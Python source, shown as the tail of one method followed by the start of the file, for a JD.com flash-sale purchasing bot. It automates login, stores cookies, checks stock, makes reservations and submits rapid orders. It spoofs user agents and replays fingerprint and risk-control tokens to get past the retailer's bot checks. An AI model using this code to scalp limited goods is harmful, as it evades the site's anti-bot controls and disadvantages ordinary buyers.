未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception: logger.info('数据解析异常,响应数据:\n %s', response_data) return False else: logger.info('下单请求异常,无响应数据') return False except Exception as e: logger.error(e) return False else: def submit_order_request(): try: submit_order_request_data['riskControl'] = self.risk_control resp = self.sess.post(url='https://trade.jd.com/shopping/order/submitOrder.action', headers=submit_order_request_headers, data=submit_order_request_data) # 暂时不设置超时时间 # resp = self.sess.post(url=url, data=data, headers=headers, timeout=(0.1, 0.08)) resp_json = json.loads(resp.text) # 返回信息示例: # 下单失败 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60123, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '请输入支付密码!'} # {'overSea': False, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'orderXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60017, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '您多次提交过快,请稍后再试'} # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 60077, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': '获取用户订单信息失败'} # {"cartXml":null,"noStockSkuIds":"xxx","reqInfo":null,"hasJxj":false,"addedServiceList":null,"overSea":false,"orderXml":null,"sign":null,"pin":"xxx","needCheckCode":false,"success":false,"resultCode":600157,"orderId":0,"submitSkuNum":0,"deductMoneyFlag":0,"goJumpOrderCenter":false,"payInfo":null,"scaleSkuInfoListVO":null,"purchaseSkuInfoListVO":null,"noSupportHomeServiceSkuList":null,"msgMobile":null,"addressVO":{"pin":"xxx","areaName":"","provinceId":xx,"cityId":xx,"countyId":xx,"townId":xx,"paymentId":0,"selected":false,"addressDetail":"xx","mobile":"xx","idCard":"","phone":null,"email":null,"selfPickMobile":null,"selfPickPhone":null,"provinceName":null,"cityName":null,"countyName":null,"townName":null,"giftSenderConsigneeName":null,"giftSenderConsigneeMobile":null,"gcLat":0.0,"gcLng":0.0,"coord_type":0,"longitude":0.0,"latitude":0.0,"selfPickOptimize":0,"consigneeId":0,"selectedAddressType":0,"siteType":0,"helpMessage":null,"tipInfo":null,"cabinetAvailable":true,"limitKeyword":0,"specialRemark":null,"siteProvinceId":0,"siteCityId":0,"siteCountyId":0,"siteTownId":0,"skuSupported":false,"addressSupported":0,"isCod":0,"consigneeName":null,"pickVOname":null,"shipmentType":0,"retTag":0,"tagSource":0,"userDefinedTag":null,"newProvinceId":0,"newCityId":0,"newCountyId":0,"newTownId":0,"newProvinceName":null,"newCityName":null,"newCountyName":null,"newTownName":null,"checkLevel":0,"optimizePickID":0,"pickType":0,"dataSign":0,"overseas":0,"areaCode":null,"nameCode":null,"appSelfPickAddress":0,"associatePickId":0,"associateAddressId":0,"appId":null,"encryptText":null,"certNum":null,"used":false,"oldAddress":false,"mapping":false,"addressType":0,"fullAddress":"xxxx","postCode":null,"addressDefault":false,"addressName":null,"selfPickAddressShuntFlag":0,"pickId":0,"pickName":null,"pickVOselected":false,"mapUrl":null,"branchId":0,"canSelected":false,"address":null,"name":"xxx","message":null,"id":0},"msgUuid":null,"message":"xxxxxx商品无货"} # {'orderXml': None, 'overSea': False, 'noStockSkuIds': 'xxx', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'cartXml': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': False, 'resultCode': 600158, 'orderId': 0, 'submitSkuNum': 0, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': {'oldAddress': False, 'mapping': False, 'pin': 'xxx', 'areaName': '', 'provinceId': xx, 'cityId': xx, 'countyId': xx, 'townId': xx, 'paymentId': 0, 'selected': False, 'addressDetail': 'xxxx', 'mobile': 'xxxx', 'idCard': '', 'phone': None, 'email': None, 'selfPickMobile': None, 'selfPickPhone': None, 'provinceName': None, 'cityName': None, 'countyName': None, 'townName': None, 'giftSenderConsigneeName': None, 'giftSenderConsigneeMobile': None, 'gcLat': 0.0, 'gcLng': 0.0, 'coord_type': 0, 'longitude': 0.0, 'latitude': 0.0, 'selfPickOptimize': 0, 'consigneeId': 0, 'selectedAddressType': 0, 'newCityName': None, 'newCountyName': None, 'newTownName': None, 'checkLevel': 0, 'optimizePickID': 0, 'pickType': 0, 'dataSign': 0, 'overseas': 0, 'areaCode': None, 'nameCode': None, 'appSelfPickAddress': 0, 'associatePickId': 0, 'associateAddressId': 0, 'appId': None, 'encryptText': None, 'certNum': None, 'addressType': 0, 'fullAddress': 'xxxx', 'postCode': None, 'addressDefault': False, 'addressName': None, 'selfPickAddressShuntFlag': 0, 'pickId': 0, 'pickName': None, 'pickVOselected': False, 'mapUrl': None, 'branchId': 0, 'canSelected': False, 'siteType': 0, 'helpMessage': None, 'tipInfo': None, 'cabinetAvailable': True, 'limitKeyword': 0, 'specialRemark': None, 'siteProvinceId': 0, 'siteCityId': 0, 'siteCountyId': 0, 'siteTownId': 0, 'skuSupported': False, 'addressSupported': 0, 'isCod': 0, 'consigneeName': None, 'pickVOname': None, 'shipmentType': 0, 'retTag': 0, 'tagSource': 0, 'userDefinedTag': None, 'newProvinceId': 0, 'newCityId': 0, 'newCountyId': 0, 'newTownId': 0, 'newProvinceName': None, 'used': False, 'address': None, 'name': 'xx', 'message': None, 'id': 0}, 'msgUuid': None, 'message': 'xxxxxx商品无货'} # 下单成功 # {'overSea': False, 'orderXml': None, 'cartXml': None, 'noStockSkuIds': '', 'reqInfo': None, 'hasJxj': False, 'addedServiceList': None, 'sign': None, 'pin': 'xxx', 'needCheckCode': False, 'success': True, 'resultCode': 0, 'orderId': 8740xxxxx, 'submitSkuNum': 1, 'deductMoneyFlag': 0, 'goJumpOrderCenter': False, 'payInfo': None, 'scaleSkuInfoListVO': None, 'purchaseSkuInfoListVO': None, 'noSupportHomeServiceSkuList': None, 'msgMobile': None, 'addressVO': None, 'msgUuid': None, 'message': None} if resp_json.get('success'): order_id = resp_json.get('orderId') logger.info('订单提交成功! 订单号:%s', order_id) if self.send_message: self.messenger.send(text='jd-assistant 订单提交成功', desp='订单号:%s' % order_id) return True else: message, result_code = resp_json.get('message'), resp_json.get('resultCode') if result_code == 0: message = message + '(下单失败)' # self._save_invoice() # message = message + '(下单商品可能为第三方商品,将切换为普通发票进行尝试)' elif result_code == 60077: message = message + '(可能是购物车为空 或 未勾选购物车中商品)' elif result_code == 60123: message = message + '(需要在config.ini文件中配置支付密码)' elif result_code == 600158: logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'很抱歉,您抢购的商品无货!本次抢购结束') return True logger.info('订单提交失败, 错误码:%s, 返回信息:%s', result_code, message) logger.info(f'响应数据:\n{resp_json}') return False except Exception as e: logger.error(e) return False self.request_info['submit_order_request'] = submit_order_request def make_seckill_connect(self): # 获取商品抢购链接请求(多种,目前添加2种) self.socket_client.init_pool("itemko.jd.com", 443, 1, 20) self.socket_client.init_pool("item-soa.jd.com", 443, 1, 20) # 访问商品抢购链接请求 self.socket_client.init_pool("yushou.jd.com", 443, 1, 10) # 访问抢购订单结算页面请求方法 # 获取秒杀初始化信息请求 self.socket_client.init_pool("marathon.jd.com", 443, 1, 10) # 【兼容】购物车请求 self.socket_client.init_pool("cart.jd.com", 443, 1, 10) # 提交抢购(秒杀)订单请求 self.socket_client.init_pool("trade.jd.com", 443, 1, 10) def make_reserve_seckill_connect(self): self.socket_client.init_pool("cart.jd.com", 443, 1) self.socket_client.init_pool("trade.jd.com", 443, 1, 15) def connect_now(self): self.socket_client.connect() def close_now(self): self.socket_client.close_client() def get_and_update_cookies_str(self): cookie_array = [] for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') self.cookies_str = ''.join(cookie_array) return self.cookies_str def get_cookies_str_by_domain_or_path(self, domain=None, path=None): cookie_array = [] if domain is None: if path is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.path == path: cookie_array.append(f'{cookie.name}={cookie.value};') elif path is None: if domain is None: for cookie in iter(self.sess.cookies): cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if cookie.domain in domain: cookie_array.append(f'{cookie.name}={cookie.value};') else: for cookie in iter(self.sess.cookies): if ( (cookie.domain in domain) and (cookie.path == path) ): cookie_array.append(f'{cookie.name}={cookie.value};') return ''.join(cookie_array) def start_by_config(self, config=global_config): if config.select_mode == 1: # 执行【预约抢购,不会自动加入购物车】 self.exec_seckill_by_time(config) elif config.select_mode == 2: # 执行【预约抢购,自动加入购物车】 手动清空自动添加到购物车的 self.exec_reserve_seckill_by_time(config)
#!/usr/bin/env python # -*- coding: utf-8 -*- import json import os import pickle import random import re import time from datetime import datetime, timedelta from urllib import parse import requests from bs4 import BeautifulSoup import CustomBrowser import address_util from config import global_config from exception import AsstException from log import logger from messenger import Messenger from socketclient import SocketClient, util from socketclient.utils import http_util from socketclient.utils.http import cookie_util from timer import Timer from util import ( DEFAULT_TIMEOUT, DEFAULT_USER_AGENT, check_login, deprecated, encrypt_pwd, encrypt_payment_pwd, get_tag_value, get_random_useragent, open_image, parse_area_id, parse_json, parse_sku_id, parse_items_dict, response_status, save_image, split_area_id, DEFAULT_M_USER_AGENT, nested_parser, nested_inner_parser ) class Assistant(object): def __init__(self, use_new=False): self.config = None self.backend_mod = util.load_backend('gevent') self.sem = self.backend_mod.Semaphore(1) self.event = self.backend_mod.Event() self.socket_client = SocketClient(backend=self.backend_mod) # 功能相关 self.concurrent_gevent_array = [] self.concurrent_count = global_config.concurrent_count self.start_func = None self.chromedriver_path = global_config.get('config', 'chromedriver_path') self.chrome_path = global_config.get('config', 'chrome_path') self.timeout = float(global_config.get('config', 'timeout') or DEFAULT_TIMEOUT) self.send_message = global_config.getboolean('messenger', 'enable') self.messenger = Messenger(global_config.get('messenger', 'sckey')) if self.send_message else None use_random_ua = global_config.getboolean('config', 'random_useragent') if use_new: self.user_agent = DEFAULT_M_USER_AGENT elif not use_random_ua: self.user_agent = DEFAULT_USER_AGENT else: self.user_agent = get_random_useragent() self.use_new = use_new self.br = None self.headers = {'User-Agent': self.user_agent} # 用户相关 if use_new: self.data = dict() self.eid = global_config.get('config', 'eid') self.fp = global_config.get('config', 'fp') self.track_id = global_config.get('config', 'track_id') self.risk_control = global_config.get('config', 'risk_control') self.letterMap = ["Z", "A", "B", "C", "D", "E", "F", "G", "H", "I"] self.area_id = None self.item_zzz = dict() self.item_url_param = dict() self.item_cat = dict() self.item_vender_ids = dict() # 记录商家id self.param_json = dict() # 记录参数 self.special_attrs = dict() # self.seckill_init_info = dict() # self.seckill_order_data = dict() # self.seckill_url = dict() self.item_requests = [] self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.item_requests.append(dict()) self.username = '' self.nick_name = '' self.is_login = False self.sess = requests.session() self.cookies_str = None # 请求信息 self.request_info = dict() try: self._load_cookies() except Exception: pass # 已登录则刷新cookies if self.is_login: self.nick_name = self.get_user_info() self._save_cookies() def init_browser(self, headless=True): br = self.br = CustomBrowser.CustomBrowser(self.user_agent, self.chromedriver_path, self.chrome_path, headless) count = 0 # 启动浏览器 while True: try: br.openUrl('chrome://version/') except Exception as e: logger.error(e) logger.error(f'无法初始化浏览器cookies,' f'请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败') if count > 3: if br: br.quit() logger.error('初始化浏览器cookies失败!' '请检查config.ini文件中chromedriver_path与chrome_path的配置 或 检查网络代理是否关闭,开启代理会导致浏览器初始化失败!') exit(-1) else: break count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) return br @property def seckill_url(self): return self.item_requests[0] @property def is_request_seckill_url(self): return self.item_requests[1] @property def seckill_init_info(self): return self.item_requests[2] @property def seckill_order_data(self): return self.item_requests[3] @property def is_seckill_checkout_page(self): return self.item_requests[4] @property def is_add_cart_request(self): return self.item_requests[5] @property def is_get_checkout_page(self): return self.item_requests[6] @property def get_submit_page_data(self): return self.item_requests[7] @property def get_promiseUuid(self): return self.item_requests[8] @property def get_submit_data(self): return self.item_requests[9] @property def get_submit_referer(self): return self.item_requests[10] def _load_cookies(self): cookies_file = '' for name in os.listdir('../cookies'): if name.endswith('.cookies'): cookies_file = '../cookies/{0}'.format(name) break with open(cookies_file, 'rb') as f: local_cookies = pickle.load(f) self.sess.cookies.update(local_cookies) self.is_login = self._validate_cookies() def _save_cookies(self): cookies_file = '../cookies/{0}.cookies'.format(self.nick_name) directory = os.path.dirname(cookies_file) if not os.path.exists(directory): os.makedirs(directory) with open(cookies_file, 'wb') as f: pickle.dump(self.sess.cookies, f) def _validate_cookies(self): """验证cookies是否有效(是否登陆) 通过访问用户订单列表页进行判断:若未登录,将会重定向到登陆页面。 :return: cookies是否有效 True/False """ if self.use_new: url = 'https://wq.jd.com/user/info/GetUserAllPinInfo' # url = 'https://home.m.jd.com/myJd/home.action' # url = 'https://home.m.jd.com/userinfom/QueryUserInfoM' params = { 'sceneval': 2, 'g_login_type': 1, 'callback': 'userInfoCallBack', 'g_ty': 'ls', '_': str(int(time.time() * 1000)) } try: resp = self.sess.get(url=url, params=params, headers={'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: html = resp.text if html and 'pin' in html: match = re.search(r'^try\{userInfoCallBack\((.*)\);\}catch\(e\)\{\}$', html) if match: json_str = match.group(1) if json_str: json_dict = json.loads(json_str) self.nick_name = json_dict['userdata']['renderJDDate'][0]['msg']['nickname'] return True except Exception as e: logger.error(e) self.sess = requests.session() return False else: url = 'https://order.jd.com/center/list.action' # payload = { # 'rid': str(int(time.time() * 1000)), # } try: resp = self.sess.get(url=url, headers={'dnt': '1', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'none', 'upgrade-insecure-requests': '1', 'user-agent': self.user_agent}, allow_redirects=False) if resp.status_code == requests.codes.OK: return True except Exception as e: logger.error(e) self.sess = requests.session() return False @deprecated def _need_auth_code(self, username): url = 'https://passport.jd.com/uc/showAuthCode' data = { 'loginName': username, } payload = { 'version': 2015, 'r': random.random(), } resp = self.sess.post(url, params=payload, data=data, headers=self.headers) if not response_status(resp): logger.error('获取是否需要验证码失败') return False resp_json = json.loads(resp.text[1:-1]) # ({"verifycode":true}) return resp_json['verifycode'] @deprecated def _get_auth_code(self, uuid): image_file = os.path.join(os.getcwd(), 'jd_authcode.jpg') url = 'https://authcode.jd.com/verify/image' payload = { 'a': 1, 'acid': uuid, 'uid': uuid, 'yys': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login', } resp = self.sess.get(url, params=payload, headers=headers) if not response_status(resp): logger.error('获取验证码失败') return '' save_image(resp, image_file) open_image(image_file) return input('验证码:') def _get_login_page(self): url = "https://passport.jd.com/new/login.aspx" page = self.sess.get(url, headers=self.headers) return page @deprecated def _get_login_data(self): page = self._get_login_page() soup = BeautifulSoup(page.text, "html.parser") input_list = soup.select('.form input') # eid & fp are generated by local javascript code according to browser environment return { 'sa_token': input_list[0]['value'], 'uuid': input_list[1]['value'], '_t': input_list[4]['value'], 'loginType': input_list[5]['value'], 'pubKey': input_list[7]['value'], 'eid': self.eid, 'fp': self.fp, } @deprecated def login_by_username(self): if self.is_login: logger.info('登录成功') return True username = input('账号:') password = input('密码:') if (not username) or (not password): logger.error('用户名或密码不能为空') return False self.username = username data = self._get_login_data() uuid = data['uuid'] auth_code = '' if self._need_auth_code(username): logger.info('本次登录需要验证码') auth_code = self._get_auth_code(uuid) else: logger.info('本次登录不需要验证码') login_url = "https://passport.jd.com/uc/loginService" payload = { 'uuid': uuid, 'version': 2015, 'r': random.random(), } data['authcode'] = auth_code data['loginname'] = username data['nloginpwd'] = encrypt_pwd(password) headers = { 'User-Agent': self.user_agent, 'Origin': 'https://passport.jd.com', } resp = self.sess.post(url=login_url, data=data, headers=headers, params=payload) if not response_status(resp): logger.error('登录失败') return False if not self._get_login_result(resp): return False # login success logger.info('登录成功') self.nick_name = self.get_user_info() self._save_cookies() self.is_login = True return True @deprecated def _get_login_result(self, resp): resp_json = parse_json(resp.text) error_msg = '' if 'success' in resp_json: # {"success":"http://www.jd.com"} return True elif 'emptyAuthcode' in resp_json: # {'_t': '_t', 'emptyAuthcode': '请输入验证码'} # {'_t': '_t', 'emptyAuthcode': '验证码不正确或验证码已过期'} error_msg = resp_json['emptyAuthcode'] elif 'username' in resp_json: # {'_t': '_t', 'username': '账户名不存在,请重新输入'} # {'username': '服务器繁忙,请稍后再试', 'venture': 'xxxx', 'p': 'xxxx', 'ventureRet': 'http://www.jd.com/', '_t': '_t'} if resp_json['username'] == '服务器繁忙,请稍后再试': error_msg = resp_json['username'] + '(预计账户存在风险,需短信激活)' else: error_msg = resp_json['username'] elif 'pwd' in resp_json: # {'pwd': '账户名与密码不匹配,请重新输入', '_t': '_t'} error_msg = resp_json['pwd'] else: error_msg = resp_json logger.error(error_msg) return False def _get_QRcode(self): url = 'https://qr.m.jd.com/show' payload = { 'appid': 133, 'size': 147, 't': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.info('获取二维码失败') return False QRCode_file = '../QRcode.png' save_image(resp, QRCode_file) logger.info('二维码获取成功,请打开京东APP扫描') open_image(QRCode_file) return True def _get_QRcode_ticket(self): url = 'https://qr.m.jd.com/check' payload = { 'appid': '133', 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'token': self.sess.cookies.get('wlfstk_smdl'), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/', } resp = self.sess.get(url=url, headers=headers, params=payload) if not response_status(resp): logger.error('获取二维码扫描结果异常') return False resp_json = parse_json(resp.text) if resp_json['code'] != 200: logger.info('Code: %s, Message: %s', resp_json['code'], resp_json['msg']) return None else: logger.info('已完成手机客户端确认') return resp_json['ticket'] def _validate_QRcode_ticket(self, ticket): url = 'https://passport.jd.com/uc/qrCodeTicketValidation' headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } resp = self.sess.get(url=url, headers=headers, params={'t': ticket}) if not response_status(resp): return False resp_json = json.loads(resp.text) if resp_json['returnCode'] == 0: return True else: logger.info(resp_json) return False def login_by_QRcode(self): """二维码登陆 :return: """ br = self.init_browser() domain = '.jd.com' br.openUrl(f'https://www{domain}') br.set_cookies(self.sess.cookies, domain) if self.is_login: logger.info('登录成功') else: self._get_login_page() # download QR code if not self._get_QRcode(): raise AsstException('二维码下载失败') # get QR code ticket ticket = None retry_times = 85 for _ in range(retry_times): ticket = self._get_QRcode_ticket() if ticket: break time.sleep(2) else: raise AsstException('二维码过期,请重新获取扫描') # validate QR code ticket if not self._validate_QRcode_ticket(ticket): raise AsstException('二维码信息校验失败') logger.info('二维码登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def login_by_browser(self): """浏览器登录 :return: """ br = self.init_browser(False) br.client.set_window_size(375, 812) domain = '.m.jd.com' # br.openUrl(f'https://plogin{domain}/login/login') br.openUrl(f'https://plogin{domain}/login/login') # br.openUrl(f'https://passport{domain}/new/login.aspx') br.set_cookies(self.sess.cookies, domain) if self.is_login: # br.openUrl(f'https://m.jd.com/') logger.info('登录成功') else: retry_count = 60 for _ in range(retry_count): pt_key = br.client.get_cookie('pt_key') if pt_key: break time.sleep(2) else: br.quit() raise AsstException('登录时间过长,请重新启动') cookies = br.client.get_cookies() for cookie in cookies: if 'expiry' in cookie: expires = cookie['expiry'] else: expires = None self.sess.cookies.set(cookie['name'], cookie['value'] , domain=cookie['domain'], secure=cookie['secure'], expires=expires) if not self._validate_cookies(): raise AsstException('浏览器登录校验失败') logger.info('浏览器登录成功') self.is_login = True self.nick_name = self.get_user_info() self._save_cookies() # 获取下单必须参数 self.init_order_request_info() def _get_reserve_url(self, sku_id): url = 'https://yushou.jd.com/youshouinfo.action' payload = { 'callback': 'fetchJSON', 'sku': sku_id, } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # {"type":"1","hasAddress":false,"riskCheck":"0","flag":false,"num":941723,"stime":"2018-10-12 12:40:00","plusEtime":"","qiangEtime":"","showPromoPrice":"0","qiangStime":"","state":2,"sku":100000287121,"info":"\u9884\u7ea6\u8fdb\u884c\u4e2d","isJ":0,"address":"","d":48824,"hidePrice":"0","yueEtime":"2018-10-19 15:01:00","plusStime":"","isBefore":0,"url":"//yushou.jd.com/toYuyue.action?sku=100000287121&key=237af0174f1cffffd227a2f98481a338","etime":"2018-10-19 15:01:00","plusD":48824,"category":"4","plusType":0,"yueStime":"2018-10-12 12:40:00"}; reserve_url = resp_json.get('url') return 'https:' + reserve_url if reserve_url else None @check_login def make_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ reserve_url = self._get_reserve_url(sku_id) if not reserve_url: logger.error('%s 非预约商品', sku_id) return headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp = self.sess.get(url=reserve_url, headers=headers) soup = BeautifulSoup(resp.text, "html.parser") reserve_result = soup.find('p', {'class': 'bd-right-result'}).text.strip(' \t\r\n') # 预约成功,已获得抢购资格 / 您已成功预约过了,无需重复预约 logger.info(reserve_result) @check_login def new_reserve(self, sku_id): """商品预约 :param sku_id: 商品id :return: """ try: page_url = 'https://wqs.jd.com/item/yuyue_item.shtml' page_payload = { 'sceneval': '2', 'buyNum': '2', 'sku': sku_id, 'isdraw': '', 'activeid': '', 'activetype': '', 'ybServiceId': '', 'homeServiceId': '', 'ycServiceId': '', 'jxsid': str(int(time.time() * 1000)) + str(random.random())[2:7] } page_headers = { 'dnt': '1', 'referer': 'https://item.m.jd.com/', 'sec-fetch-dest': 'document', 'sec-fetch-mode': 'navigate', 'sec-fetch-site': 'same-site', 'sec-fetch-user': '?1', 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } page_resp = self.sess.get(url=page_url, params=page_payload, headers=page_headers) page_html = page_resp.text if not page_html: logger.error('商品 %s 预约页面加载失败', sku_id) yuyue_url = 'https://wq.jd.com/bases/yuyue/item' yuyue_payload = { 'callback': f'subscribeItemCB{self.letterMap[1]}', 'dataType': '1', 'skuId': sku_id, 'sceneval': '2' } yuyue_headers = { 'dnt': '1', 'referer': 'https://wqs.jd.com/', 'sec-fetch-dest': 'script', 'sec-fetch-mode': 'no-cors', 'sec-fetch-site': 'same-site', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', 'User-Agent': self.user_agent } yuyue_resp = self.sess.get(url=yuyue_url, params=yuyue_payload, headers=yuyue_headers) yuyue_json = yuyue_resp.text if yuyue_json: if '"replyMsg":"预约成功"' in yuyue_json: logger.info("商品 %s 预约成功", sku_id) return True elif 'replyMsg: "您已经成功预约,不需重复预约"' in yuyue_json: logger.info("商品 %s 已经预约", sku_id) return True logger.error('响应数据:%s', yuyue_json) except Exception as e: logger.error(e) logger.error('商品 %s 预约失败,请手动预约', sku_id) return False @check_login def get_user_info(self): """获取用户信息 :return: 用户名 """ if self.use_new: return self.nick_name else: url = 'https://passport.jd.com/user/petName/getUserInfoForMiniJd.action' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), '_': str(int(time.time() * 1000)), } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://order.jd.com/center/list.action', } try: resp = self.sess.get(url=url, params=payload, headers=headers) resp_json = parse_json(resp.text) # many user info are included in response, now return nick name in it # jQuery2381773({"imgUrl":"//storage.360buyimg.com/i.imageUpload/xxx.jpg","lastLoginTime":"","nickName":"xxx","plusStatus":"0","realName":"xxx","userLevel":x,"userScoreVO":{"accountScore":xx,"activityScore":xx,"consumptionScore":xxxxx,"default":false,"financeScore":xxx,"pin":"xxx","riskScore":x,"totalScore":xxxxx}}) return resp_json.get('nickName') or 'jd' except Exception: return 'jd' def new_get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.m.jd.com/product/{}.html'.format(sku_id) headers = self.headers.copy() headers['dnt'] = '1' headers['sec-fetch-user'] = '?1' headers['sec-fetch-site'] = 'none' headers['sec-fetch-mode'] = 'navigate' headers['sec-fetch-dest'] = 'document' headers['upgrade-insecure-requests'] = '1' page = self.sess.get(url=url, headers=headers) return page def _get_item_detail_page(self, sku_id): """访问商品详情页 :param sku_id: 商品id :return: 响应 """ url = 'https://item.jd.com/{}.html'.format(sku_id) page = requests.get(url=url, headers=self.headers) return page def get_single_item_stock(self, sku_id, num, area): """获取单个商品库存状态 :param sku_id: 商品id :param num: 商品数量 :param area: 地区id :return: 商品是否有货 True/False """ area_id = parse_area_id(area) cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) if not cat: page = self._get_item_detail_page(sku_id) match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id url = 'https://c0.3.cn/stock' payload = { 'skuId': sku_id, 'buyNum': num, 'area': area_id, 'ch': 1, '_': str(int(time.time() * 1000)), 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'extraParam': '{"originid":"1"}', # get error stock state without this param 'cat': cat, # get 403 Forbidden without this param (obtained from the detail page) 'venderId': vender_id # return seller information with this param (can't be ignored) } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } resp_text = '' try: resp_text = requests.get(url=url, params=payload, headers=headers, timeout=self.timeout).text resp_json = parse_json(resp_text) stock_info = resp_json.get('stock') sku_state = stock_info.get('skuState') # 商品是否上架 stock_state = stock_info.get('StockState') # 商品库存状态:33 -- 现货 0,34 -- 无货 36 -- 采购中 40 -- 可配货 return sku_state == 1 and stock_state in (33, 40) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', sku_id, self.timeout) return False except requests.exceptions.RequestException as request_exception: logger.error('查询 %s 库存信息发生网络请求异常:%s', sku_id, request_exception) return False except Exception as e: logger.error('查询 %s 库存信息发生异常, resp: %s, exception: %s', sku_id, resp_text, e) return False @check_login def get_multi_item_stock(self, sku_ids, area): """获取多个商品库存状态(旧) 该方法需要登陆才能调用,用于同时查询多个商品的库存。 京东查询接口返回每种商品的状态:有货/无货。当所有商品都有货,返回True;否则,返回False。 :param sku_ids: 多个商品的id。可以传入中间用英文逗号的分割字符串,如"123,456" :param area: 地区id :return: 多个商品是否同时有货 True/False """ items_dict = parse_sku_id(sku_ids=sku_ids) area_id_list = split_area_id(area) url = 'https://trade.jd.com/api/v1/batch/stock' headers = { 'User-Agent': self.user_agent, 'Origin': 'https://trade.jd.com', 'Content-Type': 'application/json; charset=UTF-8', 'Referer': 'https://trade.jd.com/shopping/order/getOrderInfo.action?rid=' + str(int(time.time() * 1000)), } data = { "areaRequest": { "provinceId": area_id_list[0], "cityId": area_id_list[1], "countyId": area_id_list[2], "townId": area_id_list[3] }, "skuNumList": [] } for sku_id, count in items_dict.items(): data['skuNumList'].append({ "skuId": sku_id, "num": count }) # convert to string data = json.dumps(data) try: resp = self.sess.post(url=url, headers=headers, data=data, timeout=self.timeout) except requests.exceptions.Timeout: logger.error('查询 %s 库存信息超时(%ss)', list(items_dict.keys()), self.timeout) return False except requests.exceptions.RequestException as e: raise AsstException('查询 %s 库存信息异常:%s' % (list(items_dict.keys()), e)) resp_json = parse_json(resp.text) result = resp_json.get('result') stock = True for sku_id in result: status = result.get(sku_id).get('status') if '无货' in status: 